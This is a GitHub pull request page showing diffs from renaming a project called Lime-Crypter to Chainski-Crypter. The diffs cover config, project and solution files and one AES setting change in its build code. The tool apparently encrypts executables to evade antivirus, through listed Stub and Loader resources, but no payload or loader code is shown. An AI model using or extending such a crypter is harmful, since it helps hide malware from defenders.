Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

help #25

Open
wants to merge 47 commits into
base: master
Choose a base branch
from
Open

help #25

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
47 commits
Select commit Hold shift + click to select a range
c1f7ab5
Create main.cs
Chainski Aug 20, 2022
1a39587
Delete Lime-Crypter directory
Chainski Aug 20, 2022
50bd690
Delete Lime-Crypter.sln
Chainski Aug 20, 2022
a73a32d
Add files via upload
Chainski Aug 20, 2022
2fb14a6
Delete main.cs
Chainski Aug 20, 2022
6ac2ed3
Create main.cs
Chainski Aug 20, 2022
9d0d2ac
Add files via upload
Chainski Aug 20, 2022
f84bfba
Delete main.cs
Chainski Aug 20, 2022
971f635
Create main.cs
Chainski Aug 20, 2022
25a54ca
Add files via upload
Chainski Aug 20, 2022
414842f
Delete main.cs
Chainski Aug 20, 2022
9655f4d
Create main.cs
Chainski Aug 20, 2022
97063ae
Add files via upload
Chainski Aug 20, 2022
2871551
Delete main.cs
Chainski Aug 20, 2022
45e5202
Create main.cs
Chainski Aug 20, 2022
ef93886
Add files via upload
Chainski Aug 20, 2022
2ddc9cf
Delete main.cs
Chainski Aug 20, 2022
f5185ba
Create main.cs
Chainski Aug 20, 2022
eb2728e
Add files via upload
Chainski Aug 20, 2022
e7e593e
Delete main.cs
Chainski Aug 20, 2022
d36ea3f
Update README.md
Chainski Aug 20, 2022
6d0ccc4
Update README.md
Chainski Aug 20, 2022
983a41a
Update README.md
Chainski Aug 20, 2022
b1b24ea
Update README.md
Chainski Aug 20, 2022
a33f842
Create main.cs
Chainski Aug 20, 2022
a810bda
Add files via upload
Chainski Aug 20, 2022
b8146c2
Delete Build directory
Chainski Aug 20, 2022
b76ba55
Delete main.cs
Chainski Aug 20, 2022
678783c
Update README.md
Chainski Aug 20, 2022
7c4bc54
Update README.md
Chainski Aug 20, 2022
d8ba145
Update README.md
Chainski Aug 20, 2022
8d1ceac
Add files via upload
Chainski Aug 20, 2022
963c193
Update README.md
Chainski Aug 20, 2022
02083a0
Update README.md
Chainski Aug 20, 2022
fb3e558
Update README.md
Chainski Aug 20, 2022
9c46436
Add files via upload
Chainski Aug 20, 2022
b1c6e28
Add files via upload
Chainski Aug 20, 2022
cab5686
Add files via upload
Chainski Aug 20, 2022
8217787
Add files via upload
Chainski Aug 20, 2022
b3d6943
Update README.md
Chainski Aug 20, 2022
095ff66
Update README.md
Chainski Oct 5, 2022
1092fdd
Update README.md
Chainski Dec 26, 2022
b9cced0
Update README.md
Chainski Jan 17, 2023
166bdd0
Update README.md
Chainski Mar 24, 2024
ae4f8ea
Update README.md
Chainski Mar 24, 2024
9ea0d76
Update Stub.cs
Chainski Apr 22, 2024
9e012e5
Update Loader.cs
Chainski Apr 22, 2024
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 6 additions & 6 deletions Lime-Crypter/App.config → Chainski-Crypter/App.config
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6" />
</startup>
</configuration>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8"/>
</startup>
</configuration>
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@
using System.Threading;
using System.Threading.Tasks;

namespace Lime_Crypter.Build
namespace Chainski_Crypter.Build
{
public class SetupBuild
{
Expand Down Expand Up @@ -215,7 +215,7 @@ private byte[] AES_Encrypt(byte[] bytesToBeEncrypted)
using (RijndaelManaged AES = new RijndaelManaged())
{
AES.KeySize = 256;
AES.BlockSize = 128;
AES.BlockSize = 256;
var passwordBytes = Encoding.UTF8.GetBytes(AesKey);
var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
AES.Key = key.GetBytes(AES.KeySize / 8);
Expand Down
Original file line number Diff line number Diff line change
@@ -1,116 +1,116 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F93C99ED-28C9-48C5-BB90-DD98F18285A6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Lime_Crypter</RootNamespace>
<AssemblyName>Lime-Crypter</AssemblyName>
<TargetFrameworkVersion>v4.6</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup />
<PropertyGroup>
<ApplicationIcon>me.ico</ApplicationIcon>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Build\SetupBuild.cs" />
<Compile Include="Forms\FormChangeIcon.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormChangeIcon.Designer.cs">
<DependentUpon>FormChangeIcon.cs</DependentUpon>
</Compile>
<Compile Include="Forms\Form1.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\Form1.Designer.cs">
<DependentUpon>Form1.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FormInformation.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormInformation.Designer.cs">
<DependentUpon>FormInformation.cs</DependentUpon>
</Compile>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<None Include="Resources\Stub.cs" />
<None Include="Resources\Loader.cs" />
<Compile Include="Util\PremadeFileInfo.cs" />
<Compile Include="Util\RandomCharacters.cs" />
<Compile Include="Util\RandomFileInfo.cs" />
<EmbeddedResource Include="Forms\Form1.resx">
<DependentUpon>Form1.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormChangeIcon.resx">
<DependentUpon>FormChangeIcon.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormInformation.resx">
<DependentUpon>FormInformation.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
<SubType>Designer</SubType>
</EmbeddedResource>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="app.manifest" />
<None Include="Properties\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
</None>
<Compile Include="Properties\Settings.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<ItemGroup>
<Content Include="me.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F93C99ED-28C9-48C5-BB90-DD98F18285A6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Chainski_Crypter</RootNamespace>
<AssemblyName>Chainski-Crypter</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup />
<PropertyGroup>
<ApplicationIcon>me.ico</ApplicationIcon>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
<OutputPath>bin\x64\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<Optimize>true</Optimize>
<PlatformTarget>x64</PlatformTarget>
<LangVersion>7.3</LangVersion>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Build\SetupBuild.cs" />
<Compile Include="Forms\FormChangeIcon.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormChangeIcon.Designer.cs">
<DependentUpon>FormChangeIcon.cs</DependentUpon>
</Compile>
<Compile Include="Forms\Form1.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\Form1.Designer.cs">
<DependentUpon>Form1.cs</DependentUpon>
</Compile>
<Compile Include="Forms\FormInformation.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Forms\FormInformation.Designer.cs">
<DependentUpon>FormInformation.cs</DependentUpon>
</Compile>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<None Include="Resources\Stub.cs" />
<None Include="Resources\Loader.cs" />
<Compile Include="Util\PremadeFileInfo.cs" />
<Compile Include="Util\RandomCharacters.cs" />
<Compile Include="Util\RandomFileInfo.cs" />
<EmbeddedResource Include="Forms\Form1.resx">
<DependentUpon>Form1.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormChangeIcon.resx">
<DependentUpon>FormChangeIcon.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Forms\FormInformation.resx">
<DependentUpon>FormInformation.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
<SubType>Designer</SubType>
</EmbeddedResource>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="app.manifest" />
<None Include="Properties\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
</None>
<Compile Include="Properties\Settings.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<ItemGroup>
<Content Include="me.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
55 changes: 30 additions & 25 deletions Lime-Crypter.sln → Chainski-Crypter/Chainski-Crypter.sln
Original file line number Diff line number Diff line change
@@ -1,25 +1,30 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29009.5
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Lime-Crypter", "Lime-Crypter\Lime-Crypter.csproj", "{F93C99ED-28C9-48C5-BB90-DD98F18285A6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3D55E793-A245-4523-8798-B123DA9CC3B6}
EndGlobalSection
EndGlobal

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.2.32630.192
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chainski-Crypter", "Chainski-Crypter.csproj", "{F93C99ED-28C9-48C5-BB90-DD98F18285A6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Debug|x64 = Debug|x64
Release|Any CPU = Release|Any CPU
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Debug|Any CPU.ActiveCfg = Release|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Debug|Any CPU.Build.0 = Release|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Debug|x64.ActiveCfg = Release|x64
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|Any CPU.Build.0 = Release|Any CPU
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|x64.ActiveCfg = Release|x64
{F93C99ED-28C9-48C5-BB90-DD98F18285A6}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3D55E793-A245-4523-8798-B123DA9CC3B6}
EndGlobalSection
EndGlobal
Loading